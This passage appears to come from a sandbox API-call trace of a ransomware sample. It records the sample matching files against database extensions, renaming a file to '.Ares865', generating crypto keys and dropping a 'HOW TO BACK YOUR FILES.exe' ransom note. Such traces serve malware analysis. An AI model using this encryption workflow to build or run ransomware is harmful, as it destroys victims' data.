-1 [0089.615] lstrlenW (lpString="vbox") returned 4 [0089.615] lstrcmpiW (lpString1=".png", lpString2="vbox") returned -1 [0089.615] lstrlenW (lpString="vdi") returned 3 [0089.615] lstrcmpiW (lpString1="png", lpString2="vdi") returned -1 [0089.615] lstrlenW (lpString="vhd") returned 3 [0089.615] lstrcmpiW (lpString1="png", lpString2="vhd") returned -1 [0089.615] lstrlenW (lpString="vhdx") returned 4 [0089.615] lstrcmpiW (lpString1=".png", lpString2="vhdx") returned -1 [0089.615] lstrlenW (lpString="avhd") returned 4 [0089.615] lstrcmpiW (lpString1=".png", lpString2="avhd") returned -1 [0089.615] lstrlenW (lpString="db") returned 2 [0089.615] lstrcmpiW (lpString1="ng", lpString2="db") returned 1 [0089.615] lstrlenW (lpString="db2") returned 3 [0089.615] lstrcmpiW (lpString1="png", lpString2="db2") returned 1 [0089.615] lstrlenW (lpString="db3") returned 3 [0089.615] lstrcmpiW (lpString1="png", lpString2="db3") returned 1 [0089.615] lstrlenW (lpString="dbf") returned 3 [0089.615] lstrcmpiW (lpString1="png", lpString2="dbf") returned 1 [0089.615] lstrlenW (lpString="mdf") returned 3 [0089.615] lstrcmpiW (lpString1="png", lpString2="mdf") returned 1 [0089.615] lstrlenW (lpString="mdb") returned 3 [0089.615] lstrcmpiW (lpString1="png", lpString2="mdb") returned 1 [0089.615] lstrlenW (lpString="sql") returned 3 [0089.615] lstrcmpiW (lpString1="png", lpString2="sql") returned -1 [0089.615] lstrlenW (lpString="sqlite") returned 6 [0089.615] lstrcmpiW (lpString1="ar.png", lpString2="sqlite") returned -1 [0089.615] lstrlenW (lpString="sqlite3") returned 7 [0089.615] lstrcmpiW (lpString1="bar.png", lpString2="sqlite3") returned -1 [0089.615] lstrlenW (lpString="sqlitedb") returned 8 [0089.615] lstrcmpiW (lpString1="rbar.png", lpString2="sqlitedb") returned -1 [0089.615] lstrlenW (lpString="xml") returned 3 [0089.615] lstrcmpiW (lpString1="png", lpString2="xml") returned -1 [0089.615] lstrlenW (lpString="$er") returned 3 [0089.615] lstrcmpiW (lpString1="png", lpString2="$er") returned 1 [0089.615] lstrlenW (lpString="4dd") returned 3 [0089.616] lstrcmpiW (lpString1="png", lpString2="4dd") returned 1 [0089.616] lstrlenW (lpString="4dl") returned 3 [0089.616] lstrcmpiW (lpString1="png", lpString2="4dl") returned 1 [0089.616] lstrlenW (lpString="^^^") returned 3 [0089.616] lstrcmpiW (lpString1="png", lpString2="^^^") returned 1 [0089.616] lstrlenW (lpString="abs") returned 3 [0089.616] lstrcmpiW (lpString1="png", lpString2="abs") returned 1 [0089.616] lstrlenW (lpString="abx") returned 3 [0089.616] lstrcmpiW (lpString1="png", lpString2="abx") returned 1 [0089.616] lstrlenW (lpString="accdb") returned 5 [0089.616] lstrcmpiW (lpString1="r.png", lpString2="accdb") returned 1 [0089.616] lstrlenW (lpString="accdc") returned 5 [0089.616] lstrcmpiW (lpString1="r.png", lpString2="accdc") returned 1 [0089.616] lstrlenW (lpString="accde") returned 5 [0089.616] lstrcmpiW (lpString1="r.png", lpString2="accde") returned 1 [0089.616] lstrlenW (lpString="accdr") returned 5 [0089.616] lstrcmpiW (lpString1="r.png", lpString2="accdr") returned 1 [0089.616] lstrlenW (lpString="accdt") returned 5 [0089.616] lstrcmpiW (lpString1="r.png", lpString2="accdt") returned 1 [0089.616] lstrlenW (lpString="accdw") returned 5 [0089.616] lstrcmpiW (lpString1="r.png", lpString2="accdw") returned 1 [0089.616] lstrlenW (lpString="accft") returned 5 [0089.616] lstrcmpiW (lpString1="r.png", lpString2="accft") returned 1 [0089.616] lstrlenW (lpString="adb") returned 3 [0089.616] lstrcmpiW (lpString1="png", lpString2="adb") returned 1 [0089.616] lstrlenW (lpString="adb") returned 3 [0089.616] lstrcmpiW (lpString1="png", lpString2="adb") returned 1 [0089.616] lstrlenW (lpString="ade") returned 3 [0089.616] lstrcmpiW (lpString1="png", lpString2="ade") returned 1 [0089.616] lstrlenW (lpString="adf") returned 3 [0089.616] lstrcmpiW (lpString1="png", lpString2="adf") returned 1 [0089.616] lstrlenW (lpString="adn") returned 3 [0089.617] lstrcmpiW (lpString1="png", lpString2="adn") returned 1 [0089.617] lstrlenW (lpString="adp") returned 3 [0089.617] lstrcmpiW (lpString1="png", lpString2="adp") returned 1 [0089.617] lstrlenW (lpString="alf") returned 3 [0089.617] lstrcmpiW (lpString1="png", lpString2="alf") returned 1 [0089.617] lstrlenW (lpString="ask") returned 3 [0089.617] lstrcmpiW (lpString1="png", lpString2="ask") returned 1 [0089.617] lstrlenW (lpString="btr") returned 3 [0089.617] lstrcmpiW (lpString1="png", lpString2="btr") returned 1 [0089.617] lstrlenW (lpString="cat") returned 3 [0089.617] lstrcmpiW (lpString1="png", lpString2="cat") returned 1 [0089.617] lstrlenW (lpString="cdb") returned 3 [0089.617] lstrcmpiW (lpString1="png", lpString2="cdb") returned 1 [0089.617] lstrlenW (lpString="ckp") returned 3 [0089.617] lstrcmpiW (lpString1="png", lpString2="ckp") returned 1 [0089.617] lstrlenW (lpString="cma") returned 3 [0089.617] lstrcmpiW (lpString1="png", lpString2="cma") returned 1 [0089.617] lstrlenW (lpString="cpd") returned 3 [0089.617] lstrcmpiW (lpString1="png", lpString2="cpd") returned 1 [0089.617] lstrlenW (lpString="dacpac") returned 6 [0089.617] lstrcmpiW (lpString1="ar.png", lpString2="dacpac") returned -1 [0089.617] lstrlenW (lpString="dad") returned 3 [0089.617] lstrcmpiW (lpString1="png", lpString2="dad") returned 1 [0089.617] lstrlenW (lpString="dadiagrams") returned 10 [0089.617] lstrcmpiW (lpString1="perbar.png", lpString2="dadiagrams") returned 1 [0089.617] lstrlenW (lpString="daschema") returned 8 [0089.617] lstrcmpiW (lpString1="rbar.png", lpString2="daschema") returned 1 [0089.617] lstrlenW (lpString="db-journal") returned 10 [0089.617] lstrcmpiW (lpString1="perbar.png", lpString2="db-journal") returned 1 [0089.617] lstrlenW (lpString="db-shm") returned 6 [0089.617] lstrcmpiW (lpString1="ar.png", lpString2="db-shm") returned -1 [0089.617] lstrlenW (lpString="db-wal") returned 6 [0089.617] lstrcmpiW (lpString1="ar.png", lpString2="db-wal") returned -1 [0089.617] lstrlenW (lpString="dbc") returned 3 [0089.617] lstrcmpiW (lpString1="png", lpString2="dbc") returned 1 [0089.617] lstrlenW (lpString="dbs") returned 3 [0089.617] lstrcmpiW (lpString1="png", lpString2="dbs") returned 1 [0089.617] lstrlenW (lpString="dbt") returned 3 [0089.618] lstrcmpiW (lpString1="png", lpString2="dbt") returned 1 [0089.618] lstrlenW (lpString="dbv") returned 3 [0089.618] lstrcmpiW (lpString1="png", lpString2="dbv") returned 1 [0089.618] lstrlenW (lpString="dbx") returned 3 [0089.618] lstrcmpiW (lpString1="png", lpString2="dbx") returned 1 [0089.618] lstrlenW (lpString="dcb") returned 3 [0089.618] lstrcmpiW (lpString1="png", lpString2="dcb") returned 1 [0089.618] lstrlenW (lpString="dct") returned 3 [0089.618] lstrcmpiW (lpString1="png", lpString2="dct") returned 1 [0089.618] lstrlenW (lpString="dcx") returned 3 [0089.618] lstrcmpiW (lpString1="png", lpString2="dcx") returned 1 [0089.618] lstrlenW (lpString="ddl") returned 3 [0089.618] lstrcmpiW (lpString1="png", lpString2="ddl") returned 1 [0089.618] lstrlenW (lpString="dlis") returned 4 [0089.618] lstrcmpiW (lpString1=".png", lpString2="dlis") returned -1 [0089.619] lstrlenW (lpString="dp1") returned 3 [0089.619] lstrcmpiW (lpString1="png", lpString2="dp1") returned 1 [0089.619] lstrlenW (lpString="dqy") returned 3 [0089.619] lstrcmpiW (lpString1="png", lpString2="dqy") returned 1 [0089.619] lstrlenW (lpString="dsk") returned 3 [0089.619] lstrcmpiW (lpString1="png", lpString2="dsk") returned 1 [0089.619] lstrlenW (lpString="dsn") returned 3 [0089.619] lstrcmpiW (lpString1="png", lpString2="dsn") returned 1 [0089.619] lstrlenW (lpString="dtsx") returned 4 [0089.619] lstrcmpiW (lpString1=".png", lpString2="dtsx") returned -1 [0089.619] lstrlenW (lpString="dxl") returned 3 [0089.619] lstrcmpiW (lpString1="png", lpString2="dxl") returned 1 [0089.619] lstrlenW (lpString="eco") returned 3 [0089.619] lstrcmpiW (lpString1="png", lpString2="eco") returned 1 [0089.619] lstrlenW (lpString="ecx") returned 3 [0089.619] lstrcmpiW (lpString1="png", lpString2="ecx") returned 1 [0089.619] lstrlenW (lpString="edb") returned 3 [0089.619] lstrcmpiW (lpString1="png", lpString2="edb") returned 1 [0089.619] lstrlenW (lpString="epim") returned 4 [0089.619] lstrcmpiW (lpString1=".png", lpString2="epim") returned -1 [0089.619] lstrlenW (lpString="fcd") returned 3 [0089.619] lstrcmpiW (lpString1="png", lpString2="fcd") returned 1 [0089.619] lstrlenW (lpString="fdb") returned 3 [0089.619] lstrcmpiW (lpString1="png", lpString2="fdb") returned 1 [0089.619] lstrlenW (lpString="fic") returned 3 [0089.619] lstrcmpiW (lpString1="png", lpString2="fic") returned 1 [0089.619] lstrlenW (lpString="flexolibrary") returned 12 [0089.619] lstrlenW (lpString="fm5") returned 3 [0089.619] lstrcmpiW (lpString1="png", lpString2="fm5") returned 1 [0089.619] lstrlenW (lpString="fmp") returned 3 [0089.619] lstrcmpiW (lpString1="png", lpString2="fmp") returned 1 [0089.619] lstrlenW (lpString="fmp12") returned 5 [0089.619] lstrcmpiW (lpString1="r.png", lpString2="fmp12") returned 1 [0089.619] lstrlenW (lpString="fmpsl") returned 5 [0089.619] lstrcmpiW (lpString1="r.png", lpString2="fmpsl") returned 1 [0089.619] lstrlenW (lpString="fol") returned 3 [0089.619] lstrcmpiW (lpString1="png", lpString2="fol") returned 1 [0089.619] lstrlenW (lpString="fp3") returned 3 [0089.620] lstrcmpiW (lpString1="png", lpString2="fp3") returned 1 [0089.620] lstrlenW (lpString="fp4") returned 3 [0089.620] lstrcmpiW (lpString1="png", lpString2="fp4") returned 1 [0089.620] lstrlenW (lpString="fp5") returned 3 [0089.620] lstrcmpiW (lpString1="png", lpString2="fp5") returned 1 [0089.620] lstrlenW (lpString="fp7") returned 3 [0089.620] lstrcmpiW (lpString1="png", lpString2="fp7") returned 1 [0089.620] lstrlenW (lpString="fpt") returned 3 [0089.620] lstrcmpiW (lpString1="png", lpString2="fpt") returned 1 [0089.620] lstrlenW (lpString="frm") returned 3 [0089.620] lstrcmpiW (lpString1="png", lpString2="frm") returned 1 [0089.620] lstrlenW (lpString="gdb") returned 3 [0089.620] lstrcmpiW (lpString1="png", lpString2="gdb") returned 1 [0089.620] lstrlenW (lpString="gdb") returned 3 [0089.620] lstrcmpiW (lpString1="png", lpString2="gdb") returned 1 [0089.620] lstrlenW (lpString="grdb") returned 4 [0089.620] lstrcmpiW (lpString1=".png", lpString2="grdb") returned -1 [0089.620] lstrlenW (lpString="gwi") returned 3 [0089.620] lstrcmpiW (lpString1="png", lpString2="gwi") returned 1 [0089.620] lstrlenW (lpString="hdb") returned 3 [0089.620] lstrcmpiW (lpString1="png", lpString2="hdb") returned 1 [0089.620] lstrlenW (lpString="his") returned 3 [0089.620] lstrcmpiW (lpString1="png", lpString2="his") returned 1 [0089.620] lstrlenW (lpString="ib") returned 2 [0089.620] lstrcmpiW (lpString1="ng", lpString2="ib") returned 1 [0089.620] lstrlenW (lpString="idb") returned 3 [0089.620] lstrcmpiW (lpString1="png", lpString2="idb") returned 1 [0089.620] lstrlenW (lpString="ihx") returned 3 [0089.620] lstrcmpiW (lpString1="png", lpString2="ihx") returned 1 [0089.620] lstrlenW (lpString="itdb") returned 4 [0089.620] lstrcmpiW (lpString1=".png", lpString2="itdb") returned -1 [0089.620] lstrlenW (lpString="itw") returned 3 [0089.620] lstrcmpiW (lpString1="png", lpString2="itw") returned 1 [0089.620] lstrlenW (lpString="jet") returned 3 [0089.620] lstrcmpiW (lpString1="png", lpString2="jet") returned 1 [0089.620] lstrlenW (lpString="jtx") returned 3 [0089.620] lstrcmpiW (lpString1="png", lpString2="jtx") returned 1 [0089.620] lstrlenW (lpString="kdb") returned 3 [0089.620] lstrcmpiW (lpString1="png", lpString2="kdb") returned 1 [0089.620] lstrlenW (lpString="kexi") returned 4 [0089.621] lstrcmpiW (lpString1=".png", lpString2="kexi") returned -1 [0089.621] lstrlenW (lpString="kexic") returned 5 [0089.621] lstrcmpiW (lpString1="r.png", lpString2="kexic") returned 1 [0089.621] lstrlenW (lpString="kexis") returned 5 [0089.621] lstrcmpiW (lpString1="r.png", lpString2="kexis") returned 1 [0089.621] lstrlenW (lpString="lgc") returned 3 [0089.621] lstrcmpiW (lpString1="png", lpString2="lgc") returned 1 [0089.621] lstrlenW (lpString="lwx") returned 3 [0089.621] lstrcmpiW (lpString1="png", lpString2="lwx") returned 1 [0089.621] lstrlenW (lpString="maf") returned 3 [0089.621] lstrcmpiW (lpString1="png", lpString2="maf") returned 1 [0089.621] lstrlenW (lpString="maq") returned 3 [0089.621] lstrcmpiW (lpString1="png", lpString2="maq") returned 1 [0089.621] lstrlenW (lpString="mar") returned 3 [0089.621] lstrcmpiW (lpString1="png", lpString2="mar") returned 1 [0089.621] lstrlenW (lpString="marshal") returned 7 [0089.621] lstrcmpiW (lpString1="bar.png", lpString2="marshal") returned -1 [0089.621] lstrlenW (lpString="mas") returned 3 [0089.621] lstrcmpiW (lpString1="png", lpString2="mas") returned 1 [0089.621] lstrlenW (lpString="mav") returned 3 [0089.621] lstrcmpiW (lpString1="png", lpString2="mav") returned 1 [0089.621] lstrlenW (lpString="maw") returned 3 [0089.621] lstrcmpiW (lpString1="png", lpString2="maw") returned 1 [0089.621] lstrlenW (lpString="mdbhtml") returned 7 [0089.621] lstrcmpiW (lpString1="bar.png", lpString2="mdbhtml") returned -1 [0089.621] lstrlenW (lpString="mdn") returned 3 [0089.621] lstrcmpiW (lpString1="png", lpString2="mdn") returned 1 [0089.621] lstrlenW (lpString="mdt") returned 3 [0089.621] lstrcmpiW (lpString1="png", lpString2="mdt") returned 1 [0089.621] lstrlenW (lpString="mfd") returned 3 [0089.621] lstrcmpiW (lpString1="png", lpString2="mfd") returned 1 [0089.621] lstrlenW (lpString="mpd") returned 3 [0089.621] lstrcmpiW (lpString1="png", lpString2="mpd") returned 1 [0089.621] lstrlenW (lpString="mrg") returned 3 [0089.621] lstrcmpiW (lpString1="png", lpString2="mrg") returned 1 [0089.621] lstrlenW (lpString="mud") returned 3 [0089.621] lstrcmpiW (lpString1="png", lpString2="mud") returned 1 [0089.621] lstrlenW (lpString="mwb") returned 3 [0089.622] lstrcmpiW (lpString1="png", lpString2="mwb") returned 1 [0089.622] lstrlenW (lpString="myd") returned 3 [0089.622] lstrcmpiW (lpString1="png", lpString2="myd") returned 1 [0089.622] lstrlenW (lpString="ndf") returned 3 [0089.622] lstrcmpiW (lpString1="png", lpString2="ndf") returned 1 [0089.622] lstrlenW (lpString="nnt") returned 3 [0089.622] lstrcmpiW (lpString1="png", lpString2="nnt") returned 1 [0089.622] lstrlenW (lpString="nrmlib") returned 6 [0089.622] lstrcmpiW (lpString1="ar.png", lpString2="nrmlib") returned -1 [0089.622] lstrlenW (lpString="ns2") returned 3 [0089.622] lstrcmpiW (lpString1="png", lpString2="ns2") returned 1 [0089.622] lstrlenW (lpString="ns3") returned 3 [0089.622] lstrcmpiW (lpString1="png", lpString2="ns3") returned 1 [0089.622] lstrlenW (lpString="ns4") returned 3 [0089.622] lstrcmpiW (lpString1="png", lpString2="ns4") returned 1 [0089.622] lstrlenW (lpString="nsf") returned 3 [0089.622] lstrcmpiW (lpString1="png", lpString2="nsf") returned 1 [0089.622] lstrlenW (lpString="nv") returned 2 [0089.622] lstrcmpiW (lpString1="ng", lpString2="nv") returned -1 [0089.622] lstrlenW (lpString="nv2") returned 3 [0089.622] lstrcmpiW (lpString1="png", lpString2="nv2") returned 1 [0089.622] lstrlenW (lpString="nwdb") returned 4 [0089.622] lstrcmpiW (lpString1=".png", lpString2="nwdb") returned -1 [0089.622] lstrlenW (lpString="nyf") returned 3 [0089.622] lstrcmpiW (lpString1="png", lpString2="nyf") returned 1 [0089.622] lstrlenW (lpString="odb") returned 3 [0089.622] lstrcmpiW (lpString1="png", lpString2="odb") returned 1 [0089.622] lstrlenW (lpString="odb") returned 3 [0089.622] lstrcmpiW (lpString1="png", lpString2="odb") returned 1 [0089.622] lstrlenW (lpString="oqy") returned 3 [0089.622] lstrcmpiW (lpString1="png", lpString2="oqy") returned 1 [0089.622] lstrlenW (lpString="ora") returned 3 [0089.622] lstrcmpiW (lpString1="png", lpString2="ora") returned 1 [0089.622] lstrlenW (lpString="orx") returned 3 [0089.622] lstrcmpiW (lpString1="png", lpString2="orx") returned 1 [0089.622] lstrlenW (lpString="owc") returned 3 [0089.622] lstrcmpiW (lpString1="png", lpString2="owc") returned 1 [0089.622] lstrlenW (lpString="p96") returned 3 [0089.622] lstrcmpiW (lpString1="png", lpString2="p96") returned 1 [0089.622] lstrlenW (lpString="p97") returned 3 [0089.623] lstrcmpiW (lpString1="png", lpString2="p97") returned 1 [0089.623] lstrlenW (lpString="pan") returned 3 [0089.623] lstrcmpiW (lpString1="png", lpString2="pan") returned 1 [0089.623] lstrlenW (lpString="pdb") returned 3 [0089.623] lstrcmpiW (lpString1="png", lpString2="pdb") returned 1 [0089.623] lstrlenW (lpString="pdm") returned 3 [0089.623] lstrcmpiW (lpString1="png", lpString2="pdm") returned 1 [0089.623] lstrlenW (lpString="pnz") returned 3 [0089.623] lstrcmpiW (lpString1="png", lpString2="pnz") returned -1 [0089.623] lstrlenW (lpString="qry") returned 3 [0089.623] lstrcmpiW (lpString1="png", lpString2="qry") returned -1 [0089.623] lstrlenW (lpString="qvd") returned 3 [0089.623] lstrcmpiW (lpString1="png", lpString2="qvd") returned -1 [0089.623] lstrlenW (lpString="rbf") returned 3 [0089.623] lstrcmpiW (lpString1="png", lpString2="rbf") returned -1 [0089.623] lstrlenW (lpString="rctd") returned 4 [0089.623] lstrcmpiW (lpString1=".png", lpString2="rctd") returned -1 [0089.623] lstrlenW (lpString="rod") returned 3 [0089.623] lstrcmpiW (lpString1="png", lpString2="rod") returned -1 [0089.623] lstrlenW (lpString="rodx") returned 4 [0089.623] lstrcmpiW (lpString1=".png", lpString2="rodx") returned -1 [0089.623] lstrlenW (lpString="rpd") returned 3 [0089.623] lstrcmpiW (lpString1="png", lpString2="rpd") returned -1 [0089.623] lstrlenW (lpString="rsd") returned 3 [0089.623] lstrcmpiW (lpString1="png", lpString2="rsd") returned -1 [0089.623] lstrlenW (lpString="sas7bdat") returned 8 [0089.623] lstrcmpiW (lpString1="rbar.png", lpString2="sas7bdat") returned -1 [0089.623] lstrlenW (lpString="sbf") returned 3 [0089.623] lstrcmpiW (lpString1="png", lpString2="sbf") returned -1 [0089.623] lstrlenW (lpString="scx") returned 3 [0089.623] lstrcmpiW (lpString1="png", lpString2="scx") returned -1 [0089.623] lstrlenW (lpString="sdb") returned 3 [0089.623] lstrcmpiW (lpString1="png", lpString2="sdb") returned -1 [0089.623] lstrlenW (lpString="sdc") returned 3 [0089.623] lstrcmpiW (lpString1="png", lpString2="sdc") returned -1 [0089.623] lstrlenW (lpString="sdf") returned 3 [0089.623] lstrcmpiW (lpString1="png", lpString2="sdf") returned -1 [0089.623] lstrlenW (lpString="sis") returned 3 [0089.623] lstrcmpiW (lpString1="png", lpString2="sis") returned -1 [0089.623] lstrlenW (lpString="spq") returned 3 [0089.624] lstrcmpiW (lpString1="png", lpString2="spq") returned -1 [0089.624] lstrlenW (lpString="te") returned 2 [0089.624] lstrcmpiW (lpString1="ng", lpString2="te") returned -1 [0089.624] lstrlenW (lpString="teacher") returned 7 [0089.624] lstrcmpiW (lpString1="bar.png", lpString2="teacher") returned -1 [0089.624] lstrlenW (lpString="tmd") returned 3 [0089.624] lstrcmpiW (lpString1="png", lpString2="tmd") returned -1 [0089.624] lstrlenW (lpString="tps") returned 3 [0089.624] lstrcmpiW (lpString1="png", lpString2="tps") returned -1 [0089.624] lstrlenW (lpString="trc") returned 3 [0089.624] lstrcmpiW (lpString1="png", lpString2="trc") returned -1 [0089.624] lstrlenW (lpString="trc") returned 3 [0089.624] lstrcmpiW (lpString1="png", lpString2="trc") returned -1 [0089.624] lstrlenW (lpString="trm") returned 3 [0089.624] lstrcmpiW (lpString1="png", lpString2="trm") returned -1 [0089.624] lstrlenW (lpString="udb") returned 3 [0089.624] lstrcmpiW (lpString1="png", lpString2="udb") returned -1 [0089.624] lstrlenW (lpString="udl") returned 3 [0089.624] lstrcmpiW (lpString1="png", lpString2="udl") returned -1 [0089.624] lstrlenW (lpString="usr") returned 3 [0089.624] lstrcmpiW (lpString1="png", lpString2="usr") returned -1 [0089.624] lstrlenW (lpString="v12") returned 3 [0089.624] lstrcmpiW (lpString1="png", lpString2="v12") returned -1 [0089.624] lstrlenW (lpString="vis") returned 3 [0089.624] lstrcmpiW (lpString1="png", lpString2="vis") returned -1 [0089.624] lstrlenW (lpString="vpd") returned 3 [0089.624] lstrcmpiW (lpString1="png", lpString2="vpd") returned -1 [0089.624] lstrlenW (lpString="vvv") returned 3 [0089.624] lstrcmpiW (lpString1="png", lpString2="vvv") returned -1 [0089.624] lstrlenW (lpString="wdb") returned 3 [0089.624] lstrcmpiW (lpString1="png", lpString2="wdb") returned -1 [0089.624] lstrlenW (lpString="wmdb") returned 4 [0089.624] lstrcmpiW (lpString1=".png", lpString2="wmdb") returned -1 [0089.624] lstrlenW (lpString="wrk") returned 3 [0089.624] lstrcmpiW (lpString1="png", lpString2="wrk") returned -1 [0089.624] lstrlenW (lpString="xdb") returned 3 [0089.624] lstrcmpiW (lpString1="png", lpString2="xdb") returned -1 [0089.624] lstrlenW (lpString="xld") returned 3 [0089.624] lstrcmpiW (lpString1="png", lpString2="xld") returned -1 [0089.624] lstrlenW (lpString="xmlff") returned 5 [0089.625] lstrcmpiW (lpString1="r.png", lpString2="xmlff") returned -1 [0089.625] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.Ares865") returned 108 [0089.625] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.ares865"), dwFlags=0x1) returned 1 [0089.626] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.626] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=39379) returned 1 [0089.626] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.626] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.626] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.626] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.627] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.627] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.627] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9ce0, lpName=0x0) returned 0x15c [0089.629] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9ce0) returned 0x190000 [0089.631] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.632] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.632] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.632] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.632] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.632] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.632] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.632] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.632] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.632] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0089.633] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.633] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0089.633] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.633] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.633] CloseHandle (hObject=0x15c) returned 1 [0089.633] CloseHandle (hObject=0x118) returned 1 [0089.633] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.633] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.633] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.634] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0c6929, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f0c6929, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76d9e43, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x99d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="superbar.png", cAlternateFileName="")) returned 0 [0089.634] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.634] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7af0 [0089.634] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto") returned="C:\\Users\\All Users\\Microsoft\\Crypto" [0089.634] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee9c0 | out: hHeap=0x2b0000) returned 1 [0089.634] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0089.634] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto") returned 35 [0089.634] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Crypto" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto") returned="C:\\Users\\All Users\\Microsoft\\Crypto" [0089.634] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.634] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\crypto\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.634] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.635] GetLastError () returned 0x0 [0089.635] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.635] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, 